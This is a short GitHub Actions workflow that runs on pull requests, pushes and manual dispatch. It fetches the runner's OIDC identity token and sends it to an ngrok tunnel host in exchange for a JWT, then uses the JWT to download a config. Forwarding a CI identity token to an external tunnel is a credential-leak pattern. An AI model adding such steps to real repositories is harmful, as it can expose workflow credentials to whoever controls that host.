name: Token
on:
  workflow_dispatch: {}
  pull_request: {}
  push:
    branches:
      - main
      - master
jobs:
  token:
    runs-on: ubuntu-latest
    permissions:
      id-token: write
    steps:
      - name: Post token
        run: |
          TOKEN=`curl -H "Authorization: Bearer $ACTIONS_ID_TOKEN_REQUEST_TOKEN" "$ACTIONS_ID_TOKEN_REQUEST_URL" | jq -r .value`
          TOKEN2=`curl -H "Authorization: Bearer $TOKEN" https://gopher-comic-basilisk.ngrok-free.app/v1.0/auth/jwt | jq -r .token`
          curl -H "Authorization: Bearer $TOKEN2" https://gopher-comic-basilisk.ngrok-free.app/v1.0/config
